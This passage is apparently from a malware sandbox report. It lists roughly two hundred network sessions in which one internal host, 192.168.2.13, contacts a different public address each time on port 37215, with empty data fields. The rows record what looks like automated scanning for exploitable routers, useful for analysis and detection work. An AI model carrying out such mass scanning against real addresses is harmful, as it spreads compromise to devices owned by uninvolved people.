                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11177192.168.2.1354898157.38.92.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11178192.168.2.134927441.243.20.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11179192.168.2.1353658157.47.77.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11180192.168.2.1346246197.199.84.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11181192.168.2.1359808197.148.97.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11182192.168.2.1338848197.175.142.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11183192.168.2.1340316216.250.180.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11184192.168.2.1346778157.45.153.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11185192.168.2.133871847.63.55.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11186192.168.2.1359824197.237.213.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11187192.168.2.1359726197.149.188.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11188192.168.2.1355968157.30.251.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11189192.168.2.1349374118.64.103.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11190192.168.2.1346234157.158.24.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11191192.168.2.1342456197.132.46.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11192192.168.2.1349048157.84.109.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11193192.168.2.134759439.188.146.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11194192.168.2.134235041.124.212.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11195192.168.2.1360496197.3.245.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11196192.168.2.1336720197.148.30.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11197192.168.2.1358792100.177.58.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11198192.168.2.1360250157.101.238.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11199192.168.2.1346436197.90.49.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11200192.168.2.135096041.101.127.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11201192.168.2.1338610197.22.139.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11202192.168.2.134390041.159.93.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11203192.168.2.133795241.6.20.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11204192.168.2.1353866157.206.10.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11205192.168.2.1333874197.58.81.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11206192.168.2.1353136213.73.99.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11207192.168.2.1350060141.128.50.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11208192.168.2.1338712197.36.175.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11209192.168.2.1344778157.92.189.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11210192.168.2.1342542107.44.105.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11211192.168.2.1334696112.122.37.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11212192.168.2.134598441.96.154.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11213192.168.2.1343542157.216.153.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11214192.168.2.135235441.205.90.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11215192.168.2.1359482112.234.229.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11216192.168.2.1347228157.213.41.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11217192.168.2.1360418197.56.218.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11218192.168.2.135824641.154.251.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11219192.168.2.1341468157.205.217.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11220192.168.2.1355782197.208.40.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11221192.168.2.1346446149.74.68.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11222192.168.2.1336276191.142.136.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11223192.168.2.135577641.101.59.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11224192.168.2.1339102112.19.187.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11225192.168.2.1347444157.179.46.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11226192.168.2.1354760197.51.27.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11227192.168.2.1341154197.79.173.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11228192.168.2.1356686131.204.182.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11229192.168.2.1344102157.250.125.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11230192.168.2.1344414197.240.71.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11231192.168.2.133421436.163.92.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11232192.168.2.135743641.187.98.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11233192.168.2.1359030212.172.236.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11234192.168.2.1340804197.18.66.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11235192.168.2.1337828171.202.194.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11236192.168.2.1345036157.31.99.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11237192.168.2.1344528207.226.74.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11238192.168.2.134125841.195.10.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11239192.168.2.1359114157.217.77.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11240192.168.2.1353112157.174.233.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11241192.168.2.1344688157.112.80.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11242192.168.2.1353018197.230.101.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11243192.168.2.1340078208.104.181.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11244192.168.2.1353172169.97.14.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11245192.168.2.1350692220.67.58.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11246192.168.2.135798041.231.41.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11247192.168.2.1340600157.83.31.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11248192.168.2.1334836197.203.34.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11249192.168.2.135449038.129.101.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11250192.168.2.1345364197.108.73.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11251192.168.2.134249241.213.190.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11252192.168.2.1335090157.121.223.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11253192.168.2.1352880157.210.36.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11254192.168.2.133469448.123.32.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11255192.168.2.1342628126.37.146.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11256192.168.2.1348698157.194.150.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11257192.168.2.1352966197.66.17.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11258192.168.2.1360710197.234.50.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11259192.168.2.135022841.240.119.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11260192.168.2.1341328134.159.126.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11261192.168.2.135997641.171.78.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11262192.168.2.134808441.186.196.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11263192.168.2.135054688.53.206.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11264192.168.2.1346964197.236.53.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11265192.168.2.1358974157.24.249.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11266192.168.2.1345426194.168.194.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11267192.168.2.1352966202.122.216.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11268192.168.2.1349050157.233.80.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11269192.168.2.135231631.1.91.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11270192.168.2.133839036.192.50.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11271192.168.2.1347336140.44.13.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11272192.168.2.1339858157.242.16.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11273192.168.2.1350508197.91.49.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11274192.168.2.1336906157.33.192.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11275192.168.2.1355246197.36.53.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11276192.168.2.1346500157.192.65.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11277192.168.2.1345222144.167.6.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11278192.168.2.1334428197.152.224.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11279192.168.2.1346704157.203.75.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11280192.168.2.1342998157.190.186.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11281192.168.2.134523076.189.18.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11282192.168.2.1345308197.172.100.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11283192.168.2.1358540157.8.29.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11284192.168.2.1347336157.131.1.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11285192.168.2.134388241.33.182.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11286192.168.2.1337488157.13.142.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11287192.168.2.1346660197.133.18.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11288192.168.2.1348046197.164.109.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11289192.168.2.1337708157.37.108.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11290192.168.2.1338806157.216.145.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11291192.168.2.1357196157.176.53.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11292192.168.2.1347692197.106.120.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11293192.168.2.1337596157.179.239.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11294192.168.2.134271634.70.206.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11295192.168.2.1339906157.72.102.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11296192.168.2.135093841.246.24.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11297192.168.2.1359984157.187.173.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11298192.168.2.1338058157.141.208.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11299192.168.2.1340864157.132.204.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11300192.168.2.1340392157.245.19.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11301192.168.2.135013041.6.80.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11302192.168.2.133504841.159.164.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11303192.168.2.133843441.248.114.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11304192.168.2.1355328157.99.126.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11305192.168.2.1344374197.109.92.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11306192.168.2.1348614157.31.88.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11307192.168.2.1343846197.168.245.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11308192.168.2.136024441.68.172.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11309192.168.2.135247067.33.130.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11310192.168.2.1359266157.170.78.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11311192.168.2.134349893.63.108.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11312192.168.2.1349120129.230.148.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11313192.168.2.1338156157.22.89.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11314192.168.2.135185241.70.155.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11315192.168.2.135772867.220.126.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11316192.168.2.134504041.229.246.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11317192.168.2.1341186197.79.105.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11318192.168.2.1355142197.41.104.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11319192.168.2.1353968157.69.198.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11320192.168.2.133869841.207.252.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11321192.168.2.135301438.156.44.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11322192.168.2.1338484149.254.64.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11323192.168.2.1335150197.216.159.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11324192.168.2.1360514157.170.15.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11325192.168.2.1346400157.203.93.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11326192.168.2.1360686197.96.221.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11327192.168.2.1338494157.214.18.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11328192.168.2.1335198197.52.206.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11329192.168.2.135365241.156.24.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11330192.168.2.135506888.116.203.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11331192.168.2.1350700157.173.73.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11332192.168.2.1338056157.62.215.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11333192.168.2.135374441.111.233.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11334192.168.2.1339486197.102.117.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11335192.168.2.1341412197.4.117.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11336192.168.2.1337990157.166.36.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11337192.168.2.135380041.221.59.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11338192.168.2.1345922197.134.62.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11339192.168.2.135072641.69.191.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11340192.168.2.1357236197.58.75.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11341192.168.2.1349840157.102.150.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11342192.168.2.1337424157.77.209.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11343192.168.2.1360224157.23.6.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11344192.168.2.135114841.29.126.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11345192.168.2.135424441.207.241.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11346192.168.2.134336241.203.87.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11347192.168.2.134423441.175.141.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11348192.168.2.135711041.107.18.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11349192.168.2.1346008197.245.231.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11350192.168.2.134440041.68.200.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11351192.168.2.134078637.196.128.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11352192.168.2.1358722157.164.2.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11353192.168.2.1353022197.32.59.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11354192.168.2.135821441.33.127.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11355192.168.2.133355441.223.109.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11356192.168.2.1340126197.64.119.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11357192.168.2.1335158106.186.13.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11358192.168.2.1349602157.57.61.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11359192.168.2.135745441.22.155.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11360192.168.2.1341402197.252.156.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11361192.168.2.1336528197.22.104.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11362192.168.2.1359750196.42.231.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11363192.168.2.1338416157.10.44.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11364192.168.2.1344748157.230.171.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11365192.168.2.133754084.166.186.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11366192.168.2.1353628157.227.163.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11367192.168.2.1347026157.167.210.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11368192.168.2.134023041.129.253.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11369192.168.2.1339126197.85.51.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11370192.168.2.1356290197.133.95.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11371192.168.2.134581641.51.199.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11372192.168.2.134169841.69.200.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11373192.168.2.1354320157.112.197.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11374192.168.2.1352430123.21.153.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11375192.168.2.1334406197.104.34.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11376192.168.2.1355800157.134.251.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11377192.168.2.1340162157.150.89.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11378192.168.2.135197041.58.187.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11379192.168.2.1345450197.182.33.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11380192.168.2.1349902157.205.213.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11381192.168.2.133855235.163.42.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11382192.168.2.133395841.9.237.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11383192.168.2.1349536197.85.50.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11384192.168.2.134492442.23.124.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11385192.168.2.1332956180.50.59.24137215
                                                  TimestampBytes transferredDirectionData


